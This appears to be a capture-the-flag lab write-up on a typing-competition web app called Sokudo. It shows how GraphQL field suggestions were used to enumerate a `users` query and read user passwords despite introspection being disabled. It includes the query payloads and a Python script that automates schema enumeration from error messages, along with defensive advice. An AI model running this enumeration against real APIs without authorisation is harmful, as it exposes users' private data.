# Sokudo (16/04/2026)

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FfpQDi0HJzV5MbPaRY2v7%2Fimage.png?alt=media&#x26;token=77c44265-0649-4867-929f-d22d58f272cd" alt=""><figcaption></figcaption></figure>

This is a new web application! We haven't seen this one in the rotation at all, so let's take a look at it from scratch.

## Initial Analysis

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FjuFH5iBZaG28qBD6wSRW%2Fimage.png?alt=media&#x26;token=1062dcf5-501b-4bc6-8731-eaf95b1b9868" alt=""><figcaption></figcaption></figure>

We tried default credentials, blind SQLi and user enumeration against the login form; none of them is the path forward this time.

Time to create a new account!

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FLxDBYSjnEC6UAaV1STcN%2Fimage.png?alt=media&#x26;token=93d4c4c9-f44f-47a5-933c-31efc69d1805" alt=""><figcaption></figcaption></figure>

Something stands out right away during registration: immediately after the registration request, the front end fires a call to `/api/graphql`.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2Fd6RQcrnQgr7iyxx4VggT%2Fimage.png?alt=media&#x26;token=10ad955e-da9b-4eba-be2d-8471f36cc705" alt=""><figcaption></figcaption></figure>

Nevertheless, let's take a look around the web app.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FCz1k3UZ9sxo2lf2adVEy%2Fimage.png?alt=media&#x26;token=dbbdc502-f774-4ba1-bb87-5e7c8b4e2fce" alt=""><figcaption></figcaption></figure>

So this is a speed typing competition type web app.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FJh0VqiuGs6OTB9iD9mud%2Fimage.png?alt=media&#x26;token=00d0e0a7-031d-45f4-a30a-12858fbfcadc" alt=""><figcaption></figcaption></figure>

And we have a leaderboard! Of course we are #1 hehe.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FOXKIVjGQC7sTtlb7zFTy%2Fimage.png?alt=media&#x26;token=d7a137ac-2499-4135-a800-1f4f1f28b49c" alt=""><figcaption></figcaption></figure>

## Finding the bug

Okay, so while browsing the site nothing else looks off besides that GraphQL request. Burp recognises GraphQL syntax in a request body and automatically adds a GraphQL tab for it.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FjTJkm0742IH9tzIlEq0v%2Fimage.png?alt=media&#x26;token=0e49028e-1270-4887-82b3-bbdd39e275b4" alt=""><figcaption></figcaption></figure>

It looks like the following, so it formats it nicely for us and gives us the variables used:

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FMdQO7qZoE1QJF5Bn2oLw%2Fimage.png?alt=media&#x26;token=1e79b235-147d-413c-b3aa-12d33b90dada" alt=""><figcaption></figcaption></figure>

Let's send it to the Repeater and right click to open the GraphQL options:

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FudWd73L9U5K92qEbqAdB%2Fimage.png?alt=media&#x26;token=4e6af38c-0bee-4371-90f9-9a38eafb45aa" alt=""><figcaption></figcaption></figure>

From there we can swap in an introspection query to pull the schema. If introspection is enabled the server returns the full schema; if it is disabled, as it is here, we only get the error response shown further down:

{% code overflow="wrap" expandable="true" %}

```graphql
query IntrospectionQuery {
    __schema {
        queryType {
            name
        }
        mutationType {
            name
        }
        subscriptionType {
            name
        }
        types {
            ...FullType
        }
        directives {
            name
            description
            locations
            args {
                ...InputValue
            }
        }
    }
}

fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
        name
        description
        args {
            ...InputValue
        }
        type {
            ...TypeRef
        }
        isDeprecated
        deprecationReason
    }
    inputFields {
        ...InputValue
    }
    interfaces {
        ...TypeRef
    }
    enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
    }
    possibleTypes {
        ...TypeRef
    }
}

fragment InputValue on __InputValue {
    name
    description
    type {
        ...TypeRef
    }
    defaultValue
}

fragment TypeRef on __Type {
    kind
    name
    ofType {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
            }
        }
    }
}
```

{% endcode %}

and the response is:

{% code overflow="wrap" expandable="true" %}

```http
HTTP/2 200 OK
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Thu, 16 Apr 2026 11:30:59 GMT
Etag: W/"9a6-mVPDo/grP/EfDShqrTafr6Txb94"
X-Powered-By: Express
Content-Length: 2470

{"errors":[{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"__schema\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"queryType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"mutationType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"types\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"directives\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"args\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"fields\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"args\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"type\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"inputFields\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"interfaces\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"enumValues\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"possibleTypes\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"type\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."}]}
```

{% endcode %}

This is a validation failure: the server rejects every introspection meta-field in our query (`__schema`, `queryType`, `types`, `fields`, ...) and echoes their names back at us. Those are GraphQL's built-in introspection fields, not the application's own schema, so the response tells us nothing about what the app actually exposes. Two headers are still worth noting in passing: `X-Powered-By: Express` pins the backend to Node/Express, and `Access-Control-Allow-Origin: *` lets any origin read unauthenticated responses from this endpoint. Time to look at other GraphQL attack paths; ideally we will end up writing queries against fields the app itself defines.

{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/graphql-vulnerabilities" %}

Since the site only really has a typing-speed feature and a leaderboard, user data is the obvious target. Nothing in the introspection response points at users (those names are the introspection meta-fields, not app fields), so let's simply guess a query for users:

{% code overflow="wrap" expandable="true" %}

```graphql
query {
  allUsers {
    name
  }
}
```

{% endcode %}

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FBLCqiREktULd7hxe4WNF%2Fimage.png?alt=media&#x26;token=9dfbdddb-ca1e-4844-b285-bbcce775a025" alt=""><figcaption></figcaption></figure>

This one was a whoopsie as well: the `query { ... }` wrapper is not needed (the anonymous shorthand `{ ... }` is enough), and the GraphQL document has to go inside the JSON `query` string, which is how the app itself formats the request body:

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FvWpkfX9FtnCQfVS9pJ0m%2Fimage.png?alt=media&#x26;token=0d67cc89-28fe-490f-a16d-b9f4479e5ea3" alt=""><figcaption></figcaption></figure>

Nevertheless, the web app gave us the hint we needed. Back to the GraphQL interface.

## Exploitation

Well, the web app is basically telling us how to fix our query: the error suggests the real field name, so let's take the suggestion.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FqPjEpoBTjEfRcCHq2VrQ%2Fimage.png?alt=media&#x26;token=20fe4bf5-3ccd-4740-ab57-c97c8fa58309" alt=""><figcaption></figcaption></figure>

Okay, the server keeps feeding us information one step at a time:

{% code overflow="wrap" expandable="true" %}

```json
{"errors":[{"message":"Field \"users\" of type \"[User!]!\" must have a selection of subfields. Did you mean \"users { ... }\"?","locations":[{"line":1,"column":2}]}]}
```

{% endcode %}

So `users` exists and resolves to a non-null list of non-null `User` objects (`[User!]!`); the error leaks the type name for free. The question is: what are the subfields of `User`? With introspection blocked we have to work that out manually.

Unfortunately, this time the error alone doesn't hand us the way forward, so we have to guess.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FZj4cu5cyR5V02xS78i6W%2Fimage.png?alt=media&#x26;token=37b1aae5-5570-4af5-9bae-fc12b18d1504" alt=""><figcaption></figcaption></figure>

What kind of fields do users usually have? Let's remember our registration.

{% code overflow="wrap" expandable="true" %}

```json
{"username":"minatour","email":"minatour@gmail.com","password":"minatour","full_name":"minatour"}
```

{% endcode %}

and the corresponding GraphQL query:

{% code overflow="wrap" expandable="true" %}

```json
{"query":"\n  mutation LogActivity($event: String!, $userId: ID, $metadata: String) {\n    logActivity(event: $event, userId: $userId, metadata: $metadata) {\n      id\n      event\n      timestamp\n    }\n  }\n","variables":{"event":"user.register","userId":"4","metadata":"{\"username\":\"minatour\"}"}}
```

{% endcode %}

At the very least we know the app tracks a `username` and a user id (`userId` is passed as `"4"`, so ids look sequential). Note that the front end hands `userId` to the `logActivity` mutation itself rather than the server deriving it from the session, which is worth a second look in its own right.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FEXvG66rtIP7aR4qzoedl%2Fimage.png?alt=media&#x26;token=0004bd6b-0c22-490a-91d4-fd13d7e9c3c2" alt=""><figcaption></figcaption></figure>

I guess `userId` isn't a field on `User` though?

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FywJCPSsgdPp0ZTzM3CRV%2Fimage.png?alt=media&#x26;token=a397e868-35b4-42c3-bd03-004937834822" alt=""><figcaption></figcaption></figure>

Let's see whether any of the other information we sent at registration comes back out, starting with the `password` field.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FatMYLLb2MILgVwBSQ3tp%2Fimage.png?alt=media&#x26;token=ee4d24f7-f664-4bbc-9830-5f6e1b5326ac" alt=""><figcaption></figcaption></figure>

Nice lab! The `password` field is queryable on `User`, so the users query hands back the very data the registration form collected.

A practical tip: servers built on graphql-js (Apollo Server and friends) ship with field suggestions turned on, so a guess that is close enough to a real field name gets the full name handed back in the error (`Did you mean "..."?`), even when introspection has been disabled. Disabling introspection without also disabling suggestions (GraphQL Armor's block-field-suggestions plugin is one way to do that on Node) leaves this enumeration path wide open.

<figure><img src="https://2195055109-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcMiUkiiKxEC7T74iugoy%2Fuploads%2FRBcW2qO256rphH29hn4q%2Fimage.png?alt=media&#x26;token=3a793db7-a05f-4223-9c4a-eeaf8a56553e" alt=""><figcaption></figcaption></figure>

So you don't need to brute-force plurals or casing variants, for example; a near miss is enough to get the exact name.
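To make that guessing systematic, here is an added example (my code, not part of the lab or the original post) that automates the two error-message tricks used above: it pulls the element type out of a `must have a selection of subfields` error and harvests the names returned by `Did you mean ...?` suggestions. It talks to an injectable `send` function so it runs offline against a constructed stand-in for `/api/graphql` with a hypothetical hidden schema (the lab's real `User` type was never fully enumerated on this page); swap in a wrapper around `requests.post` to point it at a real target.

```python
import difflib
import re
from typing import Callable, Dict, Iterable, Optional, Set

# The two graphql-js validation messages this write-up leans on:
#   Field "users" of type "[User!]!" must have a selection of subfields. Did you mean "users { ... }"?
#   Cannot query field "usernam" on type "User". Did you mean "username"?
TYPE_RE = re.compile(r'Field "(?P<field>\w+)" of type "(?P<type>[^"]+)" must have a selection')
SUGGEST_RE = re.compile(r"Did you mean (?P<names>.+?)\?")
QUOTED_RE = re.compile(r'"([^"]+)"')

Sender = Callable[[str], dict]  # takes a GraphQL document, returns the parsed JSON response


def unwrap_type(type_str: str) -> str:
    """'[User!]!' -> 'User': drop list and non-null wrappers to get the named type."""
    return re.sub(r"[\[\]!]", "", type_str)


def parse_errors(resp: dict) -> Dict[str, object]:
    """Extract schema hints from a GraphQL error response.

    Returns {"types": {field: named type}, "suggestions": {field names}}.
    Suggestions that are not bare identifiers (e.g. 'users { ... }') are dropped.
    """
    types: Dict[str, str] = {}
    suggestions: Set[str] = set()
    for err in resp.get("errors", []):
        msg = err.get("message", "")
        m = TYPE_RE.search(msg)
        if m:
            types[m["field"]] = unwrap_type(m["type"])
        m = SUGGEST_RE.search(msg)
        if m:
            suggestions.update(n for n in QUOTED_RE.findall(m["names"]) if re.fullmatch(r"\w+", n))
    return {"types": types, "suggestions": suggestions}


def enumerate_fields(send: Sender, parent: Optional[str], guesses: Iterable[str]) -> Set[str]:
    """Query near-miss names under `parent` (None = root Query); keep exact hits and server suggestions."""
    found: Set[str] = set()
    for guess in guesses:
        query = f"{{ {parent} {{ {guess} }} }}" if parent else f"{{ {guess} }}"
        resp = send(query)
        if "errors" not in resp:
            found.add(guess)  # exact hit: the field exists as guessed
            continue
        found |= parse_errors(resp)["suggestions"]
    return found


# --- Constructed stand-in for the target: introspection off, field suggestions on. ---
# Hypothetical schema for demonstration only; it is not the lab's real schema.
HIDDEN_SCHEMA = {
    "Query": {"users": "[User!]!"},
    "User": {"id": "ID!", "username": "String!", "email": "String!", "password": "String!", "fullName": "String!"},
}


def _cannot_query(name: str, type_name: str, fields: Iterable[str]) -> str:
    """Reproduce graphql-js's FieldsOnCorrectType wording, suggestion list included."""
    msg = f'Cannot query field "{name}" on type "{type_name}".'
    close = difflib.get_close_matches(name, list(fields), n=5, cutoff=0.5)
    if close:
        quoted = [f'"{c}"' for c in close]
        if len(quoted) > 1:
            quoted[-1] = "or " + quoted[-1]
        msg += " Did you mean " + (", ".join(quoted) if len(quoted) > 2 else " ".join(quoted)) + "?"
    return msg


def fake_send(query: str) -> dict:
    """Stand-in for POST /api/graphql that understands `{ root }` and `{ root { child } }` only."""
    m = re.fullmatch(r"\{\s*(\w+)\s*(?:\{\s*(\w+)\s*\})?\s*\}", query.strip())
    if not m:
        return {"errors": [{"message": "Syntax Error: unsupported query shape in this stub"}]}
    root, child = m.group(1), m.group(2)
    root_fields = HIDDEN_SCHEMA["Query"]
    if root not in root_fields:
        return {"errors": [{"message": _cannot_query(root, "Query", root_fields)}]}
    child_type = unwrap_type(root_fields[root])
    if child is None:
        return {"errors": [{"message": f'Field "{root}" of type "{root_fields[root]}" must have a selection '
                                       f'of subfields. Did you mean "{root} {{ ... }}"?'}]}
    fields = HIDDEN_SCHEMA[child_type]
    if child in fields:
        return {"data": {root: [{child: "<redacted>"}]}}
    return {"errors": [{"message": _cannot_query(child, child_type, fields)}]}


if __name__ == "__main__":
    # Step 1: find the root field (mirrors the allUsers -> users hint from the write-up).
    print("root fields:", enumerate_fields(fake_send, None, ["allUsers"]))
    # Step 2: learn the element type of `users` from the subfield error.
    print("users resolves to:", parse_errors(fake_send("{ users }"))["types"]["users"])
    # Step 3: near-miss guesses for User fields; the server completes them for us.
    print("User fields:", sorted(enumerate_fields(fake_send, "users", ["user_name", "emai", "passwd", "name"])))
```

Against a live target, replace `fake_send` with a function that POSTs `{"query": document}` to `/api/graphql` and returns `resp.json()`; the parsing logic is the same because the messages come from graphql-js, not from this stub. The `cutoff=0.5` in the stub only approximates graphql-js's edit-distance threshold, which is why a word list of near misses (plural, snake_case, truncated, common synonyms) works better than random strings.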

